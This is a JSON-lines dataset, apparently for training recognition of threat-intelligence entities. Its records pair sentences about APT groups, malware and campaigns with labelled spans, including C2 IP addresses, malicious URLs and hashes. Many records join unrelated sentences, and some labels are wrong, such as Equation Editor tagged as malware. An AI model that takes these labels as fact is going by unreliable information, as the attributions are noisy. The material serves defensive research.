Related activity may also include a Southeast Asian government and Central Asian telecom .", "spans": {"FILEPATH: cb3dcde34fd9ff0e19381d99b02f9692": [[171, 203]], "URL: documents.myPicture.info": [[217, 241]], "URL: www.documents.myPicture.info": [[246, 274]], "FILEPATH: info.asp": [[329, 337]], "ORGANIZATION: Southeast Asian government": [[376, 402]], "ORGANIZATION: Central Asian telecom": [[407, 428]]}, "info": {"id": "cyberner_stix_train_003940", "source": "cyberner_stix_train"}} {"text": "There is the exploit code and malware used to gain access to systems , the infrastructure that provides command and control to the malware operator , and the human elements – developers who create the malware , operators who deploy it , and analysts who extract value from the stolen information . These sub-domains simulate sub-sections of the main newspapers in Spain plus some international ones like the Guardian and the Washington Post .", "spans": {"MALWARE: exploit code": [[13, 25]], "ORGANIZATION: newspapers": [[350, 360]], "ORGANIZATION: Washington Post": [[425, 440]]}, "info": {"id": "cyberner_stix_train_003941", "source": "cyberner_stix_train"}} {"text": "Downeks achieves host persistence through either the registry “ run ” key or with a shortcut in the start-up folder .", "spans": {"MALWARE: Downeks": [[0, 7]], "TOOL: registry “ run ” key": [[53, 73]], "TOOL: shortcut in the start-up folder": [[84, 115]]}, "info": {"id": "cyberner_stix_train_003942", "source": "cyberner_stix_train"}} {"text": "Once in possession of compromised payment card credentials , these actors use tools commonly known as card generators to generate new card numbers based on the compromised ones , creating additional opportunities for monetization . 
Although most malware today either seeks monetary gain or conducts espionage for economic advantage , both of these activity groups appear to seek information about specific individuals .", "spans": {"TOOL: card credentials": [[42, 58]], "THREAT_ACTOR: actors": [[67, 73]], "ORGANIZATION: economic": [[313, 321]], "THREAT_ACTOR: activity groups": [[348, 363]], "ORGANIZATION: specific individuals": [[397, 417]]}, "info": {"id": "cyberner_stix_train_003943", "source": "cyberner_stix_train"}} {"text": "] it Napoli server1rc.exodus.connexxa [ . We identified file creation times for numerous files that TEMP.Veles created during lateral movement on a target 's network . URL : http://nicoledotson.icu/debby/weatherford/Yortysnr The information sent to the C2 includes : One of the most common techniques used by Cuba actors exploited known vulnerabilities .", "spans": {"THREAT_ACTOR: TEMP.Veles": [[100, 110]], "URL: http://nicoledotson.icu/debby/weatherford/Yortysnr": [[174, 224]], "TOOL: C2": [[253, 255]], "THREAT_ACTOR: Cuba actors": [[309, 320]], "VULNERABILITY: known vulnerabilities": [[331, 352]]}, "info": {"id": "cyberner_stix_train_003944", "source": "cyberner_stix_train"}} {"text": "This variant differed significantly in functionality from the one being spread via the Tor node , further suggesting that different OnionDuke variants are intended for different kinds of victims .", "spans": {"TOOL: Tor": [[87, 90]], "MALWARE: OnionDuke": [[132, 141]]}, "info": {"id": "cyberner_stix_train_003945", "source": "cyberner_stix_train"}} {"text": "The leaked files show the NSA was allegedly targeting EastNets in Dubai , Belgium , and Egypt . 
The NetTraveler group has infected victims across multiple establishments in both the public and private sector including government institutions , embassies , the oil and gas industry , research centers , military contractors and activists .", "spans": {"ORGANIZATION: NSA": [[26, 29]], "ORGANIZATION: EastNets": [[54, 62]], "ORGANIZATION: government institutions": [[218, 241]], "ORGANIZATION: embassies": [[244, 253]], "ORGANIZATION: oil and gas industry": [[260, 280]], "ORGANIZATION: military contractors": [[302, 322]], "ORGANIZATION: activists": [[327, 336]]}, "info": {"id": "cyberner_stix_train_003946", "source": "cyberner_stix_train"}} {"text": "The complete list of apps can be seen below . It employs AES in addition to SID tricks , making it difficult to decrypt sensitive data . FinSpy , a final-stage payload that allows for an attacker to covertly learn what a target is talking about and who they are communicating with , is associated with Gamma Group — which goes by other names , including FinFisher and Lench IT Solutions . An APT32 backdoor can use HTTP over a non - standard TCP port ( e.g 14146 ) which is specified in the backdoor configuration.[5 ]", "spans": {"TOOL: AES": [[57, 60]], "TOOL: SID": [[76, 79]], "MALWARE: FinSpy": [[137, 143]], "THREAT_ACTOR: Gamma Group": [[302, 313]], "THREAT_ACTOR: FinFisher": [[354, 363]], "THREAT_ACTOR: Lench IT Solutions": [[368, 386]], "MALWARE: APT32 backdoor": [[392, 406]]}, "info": {"id": "cyberner_stix_train_003947", "source": "cyberner_stix_train"}} {"text": "As seen in Figure 2 , the app tries to open the payload from the /res/raw/ directory and generate an additional Android Package Kit ( APK ) named .app.apk : Decoy Code Figure 2 : The decoy code for the fake TikTok . Through our continuous monitoring of threats during 2018 , we observed a new wave of attacks by Gaza Cybergang Group1 targeting embassies and political personnel . 
Additionally , the operators could leverage this feature when infecting internet-facing devices in a targeted organization to allow them to reenter a network if evicted from internal hosts .", "spans": {"SYSTEM: Android Package Kit": [[112, 131]], "SYSTEM: TikTok": [[207, 213]], "THREAT_ACTOR: Gaza Cybergang Group1": [[312, 333]], "ORGANIZATION: embassies": [[344, 353]], "ORGANIZATION: political personnel": [[358, 377]]}, "info": {"id": "cyberner_stix_train_003948", "source": "cyberner_stix_train"}} {"text": "The Moscow Institute of Physics and Technology ( PsyTech ) , which specializes in applied physics , computing science , chemistry , and biology .", "spans": {"ORGANIZATION: Physics and Technology": [[24, 46]], "ORGANIZATION: PsyTech": [[49, 56]]}, "info": {"id": "cyberner_stix_train_003949", "source": "cyberner_stix_train"}} {"text": "Components of TG-4127 operations have been reported under the names APT28 , Sofacy , Sednit , and Pawn Storm .", "spans": {"THREAT_ACTOR: TG-4127": [[14, 21]], "THREAT_ACTOR: APT28": [[68, 73]], "THREAT_ACTOR: Sofacy": [[76, 82]], "THREAT_ACTOR: Sednit": [[85, 91]], "THREAT_ACTOR: Pawn Storm": [[98, 108]]}, "info": {"id": "cyberner_stix_train_003950", "source": "cyberner_stix_train"}} {"text": "In Russia , some major banks offer their clients a special service that allows them to transfer money from their bank card to their mobile phone account . Finally , there are many similarities between Gazer and other second stage backdoors used by the Turla group such as Carbon and Kazuar . Winnti : oci.dll . 
ThreatConnect collects realtime intelligence from the CISA Known Exploited Vulnerabilities Catalog and Google Project Zero , as well as other feeds and sources , enriching it with insights from sources such as the National Vulnerability Database NVD and the global ThreatConnect community .", "spans": {"TOOL: Gazer": [[201, 206]], "TOOL: backdoors": [[230, 239]], "THREAT_ACTOR: Turla": [[252, 257]], "THREAT_ACTOR: Carbon": [[272, 278]], "THREAT_ACTOR: Kazuar": [[283, 289]], "THREAT_ACTOR: Winnti": [[292, 298]], "FILEPATH: oci.dll": [[301, 308]], "ORGANIZATION: ThreatConnect": [[311, 324]], "ORGANIZATION: CISA Known Exploited Vulnerabilities Catalog": [[365, 409]], "ORGANIZATION: Google Project Zero": [[414, 433]], "ORGANIZATION: National Vulnerability Database NVD and": [[525, 564]], "ORGANIZATION: ThreatConnect community": [[576, 599]]}, "info": {"id": "cyberner_stix_train_003951", "source": "cyberner_stix_train"}} {"text": "APT33 's focus on aviation may indicate the group 's desire to gain insight into regional military aviation capabilities to enhance Iran 's aviation capabilities or to support Iran 's military and strategic decision making . It wasn't until August 2014 that we observed something which made us wonder if RedOctober is back for good .", "spans": {"THREAT_ACTOR: APT33": [[0, 5]], "ORGANIZATION: aviation": [[18, 26], [140, 148]], "ORGANIZATION: military": [[184, 192]]}, "info": {"id": "cyberner_stix_train_003952", "source": "cyberner_stix_train"}} {"text": "] it Milano server2rc.exodus.connexxa [ . XENOTIME rose to prominence in December 2017 when Dragos and FireEye jointly published details of TRISIS destructive malware targeting Schneider Electric 's Triconex safety instrumented system . Ekspertyza means expertise or examination in Ukranian . 
Based on evidence of lateral movement , the attacker potentially had access to the SCADA system for up to three months .", "spans": {"THREAT_ACTOR: XENOTIME": [[42, 50]], "ORGANIZATION: Dragos": [[92, 98]], "ORGANIZATION: FireEye": [[103, 110]], "TOOL: TRISIS": [[140, 146]], "THREAT_ACTOR: attacker": [[337, 345]], "SYSTEM: SCADA system": [[376, 388]]}, "info": {"id": "cyberner_stix_train_003953", "source": "cyberner_stix_train"}} {"text": "There are some interesting facts here .", "spans": {}, "info": {"id": "cyberner_stix_train_003954", "source": "cyberner_stix_train"}} {"text": "Moving through the infection process , NetWitness Endpoint detects the initial exploit CVE-2017-1182 in action as the Microsoft Equation Editor , EQNEDT32.exe , scores high for potentially malicious activity . Anomali Researchers were able to identify multiple samples of malicious RTF documents ITW using the same exploit for CVE-2018-0798 .", "spans": {"VULNERABILITY: CVE-2017-1182": [[87, 100]], "MALWARE: Microsoft Equation Editor": [[118, 143]], "MALWARE: EQNEDT32.exe": [[146, 158]], "ORGANIZATION: Anomali": [[210, 217]], "FILEPATH: ITW": [[296, 299]], "VULNERABILITY: exploit": [[315, 322]], "VULNERABILITY: CVE-2018-0798": [[327, 340]]}, "info": {"id": "cyberner_stix_train_003955", "source": "cyberner_stix_train"}} {"text": "Unit 26165 appears to be the organization behind at least part of the \"threat group\" of tools , techniques , and procedures known as \" Fancy Bear , \" \" Sofacy , \" \" APT28 , \" and \" Sednit \" .", "spans": {"THREAT_ACTOR: Unit 26165": [[0, 10]], "THREAT_ACTOR: Fancy Bear": [[135, 145]], "THREAT_ACTOR: Sofacy": [[152, 158]], "THREAT_ACTOR: APT28": [[165, 170]], "THREAT_ACTOR: Sednit": [[181, 187]]}, "info": {"id": "cyberner_stix_train_003956", "source": "cyberner_stix_train"}} {"text": "The ‘ onload1 ’ function then sends an HTTP GET request to the C2 domain using the value stored in the ‘ r3 ’ variable as a URL .", "spans": {"TOOL: C2": [[63, 65]]}, "info": 
{"id": "cyberner_stix_train_003957", "source": "cyberner_stix_train"}} {"text": "While TG-4127 continues to primarily threaten organizations and individuals operating in Russia and former Soviet states , this campaign illustrates its willingness to expand its scope to other targets that have intelligence of interest to the Russian government .", "spans": {"THREAT_ACTOR: TG-4127": [[6, 13]]}, "info": {"id": "cyberner_stix_train_003958", "source": "cyberner_stix_train"}} {"text": "The main goal of Silence.Downloader is to receive an executable file and run it on an infected machine . In early July 2015 , however , Kaspersky Lab found a sample that creates a decryption key with Salt1 , Salt2 , and Salt3 .", "spans": {"MALWARE: Silence.Downloader": [[17, 35]], "ORGANIZATION: Kaspersky Lab": [[136, 149]]}, "info": {"id": "cyberner_stix_train_003959", "source": "cyberner_stix_train"}} {"text": "In this blog , we will discuss one of the efforts which leveraged tools that have been known to be associated with the Sofacy group .", "spans": {"THREAT_ACTOR: Sofacy": [[119, 125]]}, "info": {"id": "cyberner_stix_train_003960", "source": "cyberner_stix_train"}} {"text": "Each sample contains a userId hardcoded , meaning that each sample can only be used in a victim . The attackers used different command and control servers ( C2s ) for each malware family , a tactic we believe was meant to thwart attempts to tie the attacks together using infrastructure alone . Similar Targets were observed where the threat actors utilized this backdoor : Japanese Tech Company , Taiwanese Government Organizations , Organizations in the Asia-Pacific Region that are of Interest to China . 
During the SolarWinds Compromise , APT29 used different compromised credentials for remote access and to move laterally .", "spans": {"TOOL: command and control servers": [[127, 154]], "ORGANIZATION: Japanese Tech Company": [[374, 395]], "ORGANIZATION: Taiwanese Government": [[398, 418]], "THREAT_ACTOR: the SolarWinds Compromise": [[515, 540]], "THREAT_ACTOR: APT29": [[543, 548]]}, "info": {"id": "cyberner_stix_train_003961", "source": "cyberner_stix_train"}} {"text": "Harvested credentials provided by an embedded Mimikatz executable facilitate the infection of other systems on the network . The backdoor was delivered via a malicious .rtf file that exploited CVE-2017-0199 .", "spans": {"MALWARE: Mimikatz": [[46, 54]], "FILEPATH: .rtf file": [[168, 177]], "VULNERABILITY: CVE-2017-0199": [[193, 206]]}, "info": {"id": "cyberner_stix_train_003962", "source": "cyberner_stix_train"}} {"text": "] top/ Oct 23 , 2017 hxxp : //online.bankaustria.at.id8817466 [ . The diagram below illustrates how we believe the actors behind the Sea Turtle campaign used DNS hijacking to achieve their end goals . Unknown .", "spans": {"MALWARE: Sea Turtle": [[133, 143]]}, "info": {"id": "cyberner_stix_train_003963", "source": "cyberner_stix_train"}} {"text": "] site , photolike [ . TG-3390 is capable of using a C2 infrastructure that spans multiple networks and registrars . Based on a bashtemp directory of the latest sample we found , there are other compiled ELF scripts , named init and init2 , that loops the kit to keep running : However , a log file on the server indicates that the C2 framework has been active since at least September 2017 , and probably \" hosted on different servers over time . 
\"", "spans": {"THREAT_ACTOR: TG-3390": [[23, 30]], "TOOL: ELF": [[204, 207]], "FILEPATH: init": [[224, 228]], "FILEPATH: init2": [[233, 238]]}, "info": {"id": "cyberner_stix_train_003964", "source": "cyberner_stix_train"}} {"text": "The address , 176.31.112.10 , is a dedicated server provided by the French OVH hosting company , but is apparently operated by an offshore secure hosting company called CrookServers.com .", "spans": {"IP_ADDRESS: 176.31.112.10": [[14, 27]], "TOOL: OVH": [[75, 78]], "ORGANIZATION: CrookServers.com": [[169, 185]]}, "info": {"id": "cyberner_stix_train_003965", "source": "cyberner_stix_train"}} {"text": "Notably , cryptocurrency mining malware is being distributed using various tactics , typically in an opportunistic and indiscriminate manner so cyber criminals will maximize their outreach and profits . One of them – ipv4.dll – has been placed by the APT with what is , in fact , a downloader for other malicious components .", "spans": {"TOOL: various tactics": [[67, 82]], "THREAT_ACTOR: cyber criminals": [[144, 159]], "FILEPATH: ipv4.dll": [[217, 225]], "MALWARE: downloader": [[282, 292]]}, "info": {"id": "cyberner_stix_train_003966", "source": "cyberner_stix_train"}} {"text": "Triada steals the money either from the users — if they haven ’ t succeeded in purchasing whatever they wanted , or from the app developers , in case the user has completed the purchase successfully . Wild Neutron 's attack took advantage of a Java zero-day exploit and used hacked forums as watering holes . 
While the malware deployed is not terribly sophisticated , it uses techniques such as DNS command and control ( C2 ) that allows it to stay under the radar at many establishments .", "spans": {"MALWARE: Triada": [[0, 6]], "THREAT_ACTOR: Wild Neutron": [[201, 213]], "VULNERABILITY: Java zero-day exploit": [[244, 265]], "TOOL: C2": [[421, 423]]}, "info": {"id": "cyberner_stix_train_003968", "source": "cyberner_stix_train"}} {"text": "Using the device accelerometer sensor it implements a simple pedometer that is used to measure movements of the victim . OceanLotus will release malicious sub-packages in the background , receive the remote control command , steal the privacy information of users such as SMS messages , contacts , call records , geographic locations , and browser records . Other groups attributed to Iranian attackers , such as Rocket Kitten , have targeted Iranian individuals in the past , including anonymous proxy users , researchers , journalists , and dissidents .", "spans": {"THREAT_ACTOR: OceanLotus": [[121, 131]], "THREAT_ACTOR: groups": [[364, 370]], "THREAT_ACTOR: attackers": [[393, 402]], "THREAT_ACTOR: Rocket Kitten": [[413, 426]], "ORGANIZATION: anonymous proxy users": [[487, 508]], "ORGANIZATION: researchers": [[511, 522]], "ORGANIZATION: journalists": [[525, 536]], "ORGANIZATION: dissidents": [[543, 553]]}, "info": {"id": "cyberner_stix_train_003969", "source": "cyberner_stix_train"}} {"text": "However , a few PHA authors spend substantial effort , time , and money to create and install their harmful app on one or a very small number of devices . As of early June 2018 , the server hosted 112 files in a subdirectory that could be accessed through a public web shell planted by the attackers . APT33 : 192.119.15.36 [REDACTED].ddns.net . 
While a sudden dip in attacks is n't too unusual for top ransomware gangs , it 's worth mentioning that in last month ’s review we speculated that Royal might be going through a rebrand .", "spans": {"TOOL: public web shell": [[258, 274]], "THREAT_ACTOR: attackers": [[290, 299]], "THREAT_ACTOR: APT33": [[302, 307]], "IP_ADDRESS: 192.119.15.36": [[310, 323]], "DOMAIN: [REDACTED].ddns.net": [[324, 343]], "THREAT_ACTOR: Royal": [[493, 498]]}, "info": {"id": "cyberner_stix_train_003970", "source": "cyberner_stix_train"}} {"text": "In fact , we believe that by the autumn of 2008 , the Dukes were already developing not one but at least two distinct malware toolsets .", "spans": {}, "info": {"id": "cyberner_stix_train_003971", "source": "cyberner_stix_train"}} {"text": "We reported the apps to the Google security team and they were swiftly removed . The threat actor behind the campaign , which Kaspersky believes to be the PLATINUM APT group , uses an elaborate , previously unseen , steganographic technique to conceal communication . The library contains the same features as the previous version as well as new ones .", "spans": {"THREAT_ACTOR: actor": [[92, 97]], "ORGANIZATION: Kaspersky": [[126, 135]], "ORGANIZATION: PLATINUM": [[155, 163]]}, "info": {"id": "cyberner_stix_train_003972", "source": "cyberner_stix_train"}} {"text": "The many changes we see in the way the attacks are performed show that attackers are heavily experimenting to find the best way of infecting a mobile device and abusing existing functionality to perform successful phishing attacks . The new activity described in this blogpost was detected by ESET in Taiwan , where the Plead malware has always been most actively deployed . Advanced persistent threats will remain a problem for companies and organizations of all sizes , especially those with high financial or intellectual property value . 
We took google - analytics as an example , but other services can also be used .", "spans": {"ORGANIZATION: ESET": [[293, 297]], "TOOL: Plead malware": [[320, 333]], "SYSTEM: google - analytics": [[550, 568]]}, "info": {"id": "cyberner_stix_train_003973", "source": "cyberner_stix_train"}} {"text": "The formation of the group and the modus operandi changed significantly in early 2017 . The ongoing operation likely began as early as January 2017 and has continued through the first quarter of 2019 .", "spans": {}, "info": {"id": "cyberner_stix_train_003974", "source": "cyberner_stix_train"}} {"text": "Traditionally , the Ke3chang attackers have used spear-phishing emails with either a malware attachment or a link to a malicious download . we believe the iOS malware gets installed on already compromised systems , and it is very similar to next stage SEDNIT malware we have found for Microsoft Windows’ systems .", "spans": {"THREAT_ACTOR: Ke3chang": [[20, 28]], "THREAT_ACTOR: attackers": [[29, 38]], "FILEPATH: SEDNIT": [[252, 258]], "ORGANIZATION: Microsoft": [[285, 294]]}, "info": {"id": "cyberner_stix_train_003975", "source": "cyberner_stix_train"}} {"text": "For example , since some banks use anti-fraud solutions that only check device fingerprinting , fraudsters can use the collected information to perform fraudulent transactions from a device that mimics that same fingerprint . The Pitty Tiger group mostly uses spear phishing in order to gain an initial foothold within the targeted environment . 
BONDUPDATER is a PowerShell-based Trojan first discovered by FireEye in mid-November 2017 , when OilRig targeted a different Middle Eastern governmental organization .", "spans": {"THREAT_ACTOR: Pitty Tiger group": [[230, 247]], "MALWARE: BONDUPDATER": [[346, 357]], "MALWARE: PowerShell-based Trojan": [[363, 386]], "ORGANIZATION: FireEye": [[407, 414]], "THREAT_ACTOR: OilRig": [[443, 449]], "ORGANIZATION: governmental organization": [[486, 511]]}, "info": {"id": "cyberner_stix_train_003976", "source": "cyberner_stix_train"}} {"text": "Determining if the two groups are related is difficult , but any relationship appears unlikely .", "spans": {}, "info": {"id": "cyberner_stix_train_003977", "source": "cyberner_stix_train"}} {"text": "In addition , to attack Windows users , they have elaborated a multi-stage infection procedure , and significantly changed the final payload .", "spans": {"SYSTEM: Windows": [[24, 31]]}, "info": {"id": "cyberner_stix_train_003978", "source": "cyberner_stix_train"}} {"text": "CozyDuke ’s modular platform approach is a clear break from the designs of the previous Duke toolsets .", "spans": {"MALWARE: CozyDuke": [[0, 8]], "THREAT_ACTOR: Duke": [[88, 92]]}, "info": {"id": "cyberner_stix_train_003979", "source": "cyberner_stix_train"}} {"text": "CTU researchers have discovered numerous details about TG-3390 operations , including how the adversaries explore a network , move laterally , and exfiltrate data .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "THREAT_ACTOR: TG-3390": [[55, 62]]}, "info": {"id": "cyberner_stix_train_003980", "source": "cyberner_stix_train"}} {"text": "After the executable is executed , it downloads Pony and Vawtrak malware variants to steal data . 
It relies on Homebrew , an open source software package manager to install Golang and Tor .", "spans": {"MALWARE: Pony": [[48, 52]], "MALWARE: Vawtrak": [[57, 64]], "TOOL: Homebrew": [[111, 119]], "TOOL: software": [[137, 145]], "TOOL: Golang": [[173, 179]], "TOOL: Tor": [[184, 187]]}, "info": {"id": "cyberner_stix_train_003981", "source": "cyberner_stix_train"}} {"text": "] ee Backend server ftp [ . On much of the C2 infrastructure we identified several crimeware family samples . Multiple block tracking for getting block comparison variable . None Why are Cyber Criminals More Likely to Target Small to Midsize Businesses \"", "spans": {"THREAT_ACTOR: Cyber Criminals": [[187, 202]], "ORGANIZATION: Small to Midsize Businesses": [[225, 252]]}, "info": {"id": "cyberner_stix_train_003982", "source": "cyberner_stix_train"}} {"text": "Increasing reliance on public code depositories , such as Carberp , PowerShell Empire , P.A.S. webshell , Metasploit modules , and others in a likely effort to accelerate their development cycle and provide plausible deniability .", "spans": {"MALWARE: Carberp": [[58, 65]], "TOOL: PowerShell": [[68, 78]], "TOOL: Empire": [[79, 85]], "TOOL: P.A.S.": [[88, 94]], "TOOL: Metasploit": [[106, 116]]}, "info": {"id": "cyberner_stix_train_003983", "source": "cyberner_stix_train"}} {"text": "The individuals using Hancitor malware also known by the name Chanitor are no exception and have taken three approaches to deliver the malware in order to ultimately steal data from their victims . 
The group , believed to be based in China , has also targeted defense contractors , colleges and universities , law firms , and political organizations — including organizations related to Chinese minority ethnic groups .", "spans": {"THREAT_ACTOR: individuals": [[4, 15]], "TOOL: Hancitor": [[22, 30]], "TOOL: Chanitor": [[62, 70]], "ORGANIZATION: defense contractors": [[260, 279]], "ORGANIZATION: colleges": [[282, 290]], "ORGANIZATION: universities": [[295, 307]], "ORGANIZATION: law firms": [[310, 319]], "ORGANIZATION: political organizations": [[326, 349]], "ORGANIZATION: minority ethnic groups": [[395, 417]]}, "info": {"id": "cyberner_stix_train_003984", "source": "cyberner_stix_train"}} {"text": "Suspected TEMP.Veles incidents include malicious activity originating from 87.245.143.140 , which is registered to CNIIHM .", "spans": {"THREAT_ACTOR: TEMP.Veles": [[10, 20]], "IP_ADDRESS: 87.245.143.140": [[75, 89]], "ORGANIZATION: CNIIHM": [[115, 121]]}, "info": {"id": "cyberner_stix_train_003985", "source": "cyberner_stix_train"}} {"text": "It appeared to be geared exclusively towards high profile targets .", "spans": {}, "info": {"id": "cyberner_stix_train_003986", "source": "cyberner_stix_train"}} {"text": "When the group's activities were detected in one incident , it had elevated privileges and had maintained access to the targeted environment for several months .", "spans": {}, "info": {"id": "cyberner_stix_train_003988", "source": "cyberner_stix_train"}} {"text": "The executable has a Microsoft Word icon to trick victims into believing they are opening a Word document .", "spans": {"ORGANIZATION: Microsoft": [[21, 30]], "TOOL: Word": [[31, 35], [92, 96]]}, "info": {"id": "cyberner_stix_train_003989", "source": "cyberner_stix_train"}} {"text": "The group 's most frequently used backdoors belong to a malware family that Microsoft has designated Dipsind , although some variants are detected under different names . 
Kaspersky Lab 's products detect and neutralize the malicious programs and its variants used by the NetTraveler Toolkit , including Trojan-Spy.Win32.TravNet and Downloader.Win32.NetTraveler .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "ORGANIZATION: Microsoft": [[76, 85]], "TOOL: Dipsind": [[101, 108]], "ORGANIZATION: Kaspersky Lab": [[171, 184]], "MALWARE: NetTraveler Toolkit": [[271, 290]], "MALWARE: Trojan-Spy.Win32.TravNet": [[303, 327]], "MALWARE: Downloader.Win32.NetTraveler": [[332, 360]]}, "info": {"id": "cyberner_stix_train_003990", "source": "cyberner_stix_train"}} {"text": "The archive is a ZIP containing several files , which is protected with a password . The threat group in this recently observed campaign – TEMP.Zagros – weaponized their malware using the following techniques . This ensures that only one copy of the malware is running at a time . The standard states that the purpose of threat intelligence should be to “ provide awareness of the organization 's threat environment so that the appropriate mitigation actions can be taken . ”", "spans": {"THREAT_ACTOR: threat group": [[89, 101]]}, "info": {"id": "cyberner_stix_train_003992", "source": "cyberner_stix_train"}} {"text": "Other attacks on Bank Austria customers that we observed resolved to the following .top domains : Oct 23 , 2017 hxxp : //online.bankaustria.at.id8817062 [ . If an attacker was able to compromise an organization's network administrator credentials , the attacker would be able to change that particular organization's DNS records at will . 
Much of the code used by this group was copied and pasted from online forums .", "spans": {"SYSTEM: Bank Austria": [[17, 29]], "THREAT_ACTOR: attacker": [[163, 171]]}, "info": {"id": "cyberner_stix_train_003993", "source": "cyberner_stix_train"}} {"text": "Opening the attachment from the email invokes PowerShell and enables command line access to the compromised machine .", "spans": {"TOOL: email": [[32, 37]], "TOOL: PowerShell": [[46, 56]]}, "info": {"id": "cyberner_stix_train_003994", "source": "cyberner_stix_train"}} {"text": "It then continues executing in a spawned new thread that checks if there are additional undesired modules inside its own virtual address space ( for example , modules injected by certain security solutions ) . Many of the Fetch samples we analyzed attempted to obfuscate their functionality by encrypting their embedded strings using AES . Winnti : T1195 Supply Chain Compromise . Someone motivated by money will likely cast a wide net and look for easy targets .", "spans": {"TOOL: AES": [[334, 337]], "THREAT_ACTOR: Winnti": [[340, 346]]}, "info": {"id": "cyberner_stix_train_003995", "source": "cyberner_stix_train"}} {"text": "machine code ( same as opcode 0x0 ) 0x18 JGE Jump if greater or equal/Jump if not less 0x19 DEREF Write a register value into a dereferenced pointer 0x1A JMP Special obfuscated “ Jump if below ” opcode 0x1B * Resolve a pointer 0x1C LOAD Load a value into the internal VM descriptor 0x1D JNE Jump if not equal/Jump if not zero 0x1E CALL Call an external function or a function located in the dropper 0x1F MOV Version 2.0 received one update in October 2013 before the malware author released version 3.0 in December 2014 . Winnti : 7cf41b1acfb05064518a2ad9e4c16fde9185cd4b Tue Nov 13 10:12:58 2018 1729131071 8272c1f4 . 
Simultaneously , a new variant of Monti , based on the Linux platform , has surfaced , demonstrating notable differences from its previous Linux - based versions .", "spans": {"THREAT_ACTOR: Winnti": [[522, 528]], "FILEPATH: 7cf41b1acfb05064518a2ad9e4c16fde9185cd4b": [[531, 571]], "THREAT_ACTOR: Monti": [[653, 658]], "SYSTEM: Linux platform": [[674, 688]]}, "info": {"id": "cyberner_stix_train_003996", "source": "cyberner_stix_train"}} {"text": "Google and Microsoft have already confirmed the Russian hacker group APT28 used a Flash vulnerability CVE-2016-7855 along with this kernel privilege escalation flaw to perform a targeted attack . At first glance CONFUCIUS_B looks very similar to CONFUCIUS_A , and they are also packaged in plain SFX binary files .", "spans": {"ORGANIZATION: Google": [[0, 6]], "ORGANIZATION: Microsoft": [[11, 20]], "THREAT_ACTOR: APT28": [[69, 74]], "VULNERABILITY: CVE-2016-7855": [[102, 115]], "FILEPATH: CONFUCIUS_B": [[212, 223]], "FILEPATH: CONFUCIUS_A": [[246, 257]], "MALWARE: SFX binary files": [[296, 312]]}, "info": {"id": "cyberner_stix_train_003997", "source": "cyberner_stix_train"}} {"text": "The usage of the PlusShare API in 2020 denotes some unprofessional development , since this is the API to access Google+ . Iranian Threat Agent Greenbug has been registering domains similar to those of Israeli High-Tech and Cyber Security Companies . This malicious Word document had an MD5 of 499bec15ac83f2c8998f03917b63652e and dropped a backdoor to C:\\DOCUMENTS and SETTINGS\\{user}\\LOCAL SETTINGS\\Temp\\word.exe . 
During the SolarWinds Compromise , APT29 used scheduler and schtasks to create new tasks on remote host as part of their lateral movement .", "spans": {"SYSTEM: PlusShare": [[17, 26]], "ORGANIZATION: Google+": [[113, 120]], "ORGANIZATION: High-Tech": [[210, 219]], "ORGANIZATION: Cyber Security Companies": [[224, 248]], "FILEPATH: 499bec15ac83f2c8998f03917b63652e": [[294, 326]], "FILEPATH: SETTINGS\\Temp\\word.exe": [[392, 414]], "THREAT_ACTOR: SolarWinds Compromise": [[428, 449]], "THREAT_ACTOR: APT29": [[452, 457]]}, "info": {"id": "cyberner_stix_train_003998", "source": "cyberner_stix_train"}} {"text": "In May 2018 , campaigns being conducted by SWEED began leveraging another vulnerability in Microsoft Office: CVE-2017-11882 , a remote code execution bug in Microsoft Office that is commonly observed being leveraged in malicious documents used in commodity malware distribution . Unlike earlier attacks when Bemstour was delivered using Buckeye's Pirpi backdoor , in this attack Bemstour was delivered to the victim by a different backdoor Trojan ( Backdoor.Filensfer ) .", "spans": {"THREAT_ACTOR: SWEED": [[43, 48]], "VULNERABILITY: CVE-2017-11882": [[109, 123]], "FILEPATH: Bemstour": [[308, 316]], "FILEPATH: Pirpi": [[347, 352]], "FILEPATH: backdoor": [[353, 361]], "MALWARE: different backdoor": [[421, 439]], "MALWARE: Trojan": [[440, 446]], "MALWARE: Backdoor.Filensfer": [[449, 467]]}, "info": {"id": "cyberner_stix_train_003999", "source": "cyberner_stix_train"}} {"text": "Smartphones are the dominant form of internet access in the region and Xinjiang was recently above the national average of internet users in China . The first confirmed date when TajMahal samples were seen on a victim’s machine is August 2014 . 
In March 2014 , the admin@338 leveraged the disappearance of Malaysia Airlines Flight MH370 to target a government in the Asia-Pacific region and a US-based think tank .", "spans": {"MALWARE: TajMahal": [[179, 187]], "THREAT_ACTOR: admin@338": [[265, 274]], "ORGANIZATION: government": [[349, 359]], "ORGANIZATION: think tank": [[402, 412]]}, "info": {"id": "cyberner_stix_train_004000", "source": "cyberner_stix_train"}} {"text": "The most recent Scarlet Mimic attacks we have identified were conducted in 2015 and suggest the group has a significant interest in both Muslim activists and those interested in critiques of the Russian government and Russian President Vladimir Putin . Finally , this geo-location supports the likely theory that the attackers behind Kimsuky are based in North Korea .", "spans": {"THREAT_ACTOR: group": [[96, 101]], "ORGANIZATION: Muslim activists": [[137, 153]], "THREAT_ACTOR: Kimsuky": [[334, 341]]}, "info": {"id": "cyberner_stix_train_004002", "source": "cyberner_stix_train"}} {"text": "LAS VEGAS—Today at the Black Hat information security conference , Dell SecureWorks researchers unveiled a report on a newly detected hacking group that has targeted companies around the world while stealing massive amounts of industrial data . FireEye recently published a blog covering the tactics , techniques , and procedures ( TTPs ) for the \" TRITON actor \" when preparing to deploy the TRITON/TRISIS malware framework in 2017 .", "spans": {"ORGANIZATION: Dell SecureWorks": [[67, 83]], "ORGANIZATION: FireEye": [[245, 252]], "MALWARE: TRITON": [[349, 355]], "MALWARE: TRITON/TRISIS": [[393, 406]], "MALWARE: malware": [[407, 414]]}, "info": {"id": "cyberner_stix_train_004003", "source": "cyberner_stix_train"}} {"text": "This vulnerability was found in a document named Trump's_Attack_on_Syria_English.docx” . 
